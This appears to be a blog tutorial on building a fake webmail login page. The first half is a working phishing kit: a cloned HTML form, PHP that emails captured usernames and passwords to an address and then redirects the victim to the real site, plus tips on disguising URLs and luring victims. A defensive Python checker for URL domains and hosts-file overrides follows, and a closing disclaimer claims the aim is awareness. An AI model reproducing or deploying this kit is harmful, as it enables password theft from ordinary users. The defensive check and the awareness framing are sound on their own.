It’s quite easy to construct a bogus login page and steal passwords. Let’s look at the methods used to construct a fake login screen and how hackers steal your password.
Step 1: Create the fake login page
a) Take the print screen of the correct login page
b) Slice the web page using some tools like Photoshop
c) Save the file as HTML
d) Clean it up
e) Replace the main text box with our text box. Name it exactly as in the original. It will help to show the dropdown while they enter the address
f) Replace the form submit button
g) The code will look like this (don’t forget to add the design elements in between. Add CSS etc as needed)
<form method="post" action="submit.php">
<input name="username" type="text" size="15" maxlength="25" />
<input name="password" type="password" size="15" maxlength="25" />
<input type="submit" value="Sign In" /></form>
Step 2: Add server side scripts to email the information and redirect to the correct login page
a) In submit.php write code like this
<?php
// pull the posted fields into $username and $password
extract($_POST);
// build the email message
$message = "user name : " . $username . " Password : " . $password;
// send the email
mail('[email protected]', 'Hey here is the password', $message);
// you are done ... redirect the user to the real site
header('Location: http://www.yahoo.com/');
?>
Step 3: Host them at a website
Host the website somewhere with server-side support such as PHP, ASP, JSP, etc.
Step 4: Make the URL so complicated that the user can’t tell whether it’s real or not
Name the login page something like yahoo.com_mail_login.php?action=login&email=yes, etc., so that even if they look at the URL they don’t get suspicious.
Step 5: Wait for the victim
Set this website as the home page on the victim’s computer, send him the link through email, etc., and simply wait. If the user is not that tech savvy, he is surely going to fall prey to the fake login screen.
See how simple it is to construct and set up a fake login screen and steal the password. Beware of such scams and be cautious while entering your password. Always look for the correct domain name before entering the password. Internet Explorer 8 onwards highlights the domain part of the URL in a different color from the rest of the address.
If you are on a shared computer, beware: the attacker can write to the Windows hosts file and even make the URL appear as mail.yahoo.com. (How? In another post.)
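As an added illustration of the two defensive points above (check the domain name, and distrust a hosts file on a shared machine), here is a small Python check written for this page; it is not code from the original article. It extracts the host part of a URL and compares it with the expected login domain, so that look-alike URLs of the kind described in Step 4 are rejected, and it scans hosts-file text for entries that pin the expected domain to some other address. The expected domain `yahoo.com`, the sample URLs and the sample hosts-file content are all constructed for the example.

```python
from urllib.parse import urlparse


def host_of(url: str) -> str:
    """Return the lowercase host part of a URL (empty string if none).

    A bare string without a scheme is treated as http://<string>, so a name
    like 'yahoo.com_mail_login.php' is parsed as a host rather than a path.
    urlparse().hostname already strips any 'user@' prefix and the port.
    """
    if "://" not in url:
        url = "http://" + url
    host = urlparse(url).hostname or ""
    return host.lower().rstrip(".")


def is_expected_domain(url: str, expected: str = "yahoo.com") -> bool:
    """True only if the URL's host is `expected` or a subdomain of it.

    Only the host is compared: the path, query string and any 'user@' prefix
    are ignored, because those are exactly where a look-alike URL puts the
    real site's name to fool a quick glance.
    """
    host = host_of(url)
    expected = expected.lower().rstrip(".")
    return host == expected or host.endswith("." + expected)


def suspicious_hosts_entries(hosts_text: str, watched=("yahoo.com",)) -> list:
    """Return (address, name) pairs from hosts-file text that override a watched
    domain or one of its subdomains. A normal hosts file has no such entries,
    so any hit means name resolution for that site has been tampered with."""
    hits = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        address, *names = line.split()
        for name in names:
            n = name.lower().rstrip(".")
            if any(n == w or n.endswith("." + w) for w in watched):
                hits.append((address, n))
    return hits


# Constructed sample URLs (not real sites) mirroring the tricks described above.
SAMPLE_URLS = {
    "https://mail.yahoo.com/": True,
    "http://www.example.net/yahoo.com_mail_login.php?action=login&email=yes": False,
    "http://yahoo.com.example.net/login": False,
    "http://mail.yahoo.com@login-host.example/": False,
    "http://yahoo.com_mail_login.php?action=login": False,
}

# Constructed hosts-file content; 203.0.113.0/24 is a documentation range.
SAMPLE_HOSTS = """\
# hosts file content made up for this example
127.0.0.1   localhost
::1         localhost
203.0.113.7 mail.yahoo.com   # an entry like this sends the real name elsewhere
"""


def check_urls(samples=SAMPLE_URLS) -> dict:
    """Map each sample URL to (result, result agrees with the expectation)."""
    return {url: (is_expected_domain(url), is_expected_domain(url) == want)
            for url, want in samples.items()}


if __name__ == "__main__":
    for url, (ok, _) in check_urls().items():
        print(("expected domain" if ok else "NOT the expected domain").ljust(24), url)
    for address, name in suspicious_hosts_entries(SAMPLE_HOSTS):
        print(f"hosts file overrides {name} -> {address}")
```

The host comparison deliberately checks for `expected` or a subdomain of it, not for the string appearing anywhere in the URL; the latter is what the `yahoo.com_mail_login.php` trick relies on. A hosts-file hit for the login domain on a shared computer is a reason to stop and verify the machine before entering anything.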
Sample page : http://www.phishingsucks.110mb.com/ (Don’t enter your real password)
Result page : http://phishingsucks.110mb.com/passwd.htm
We don’t endorse hacking or spying; this article was written to show how easy it is to set up a fake login screen and how careful we have to be while entering passwords.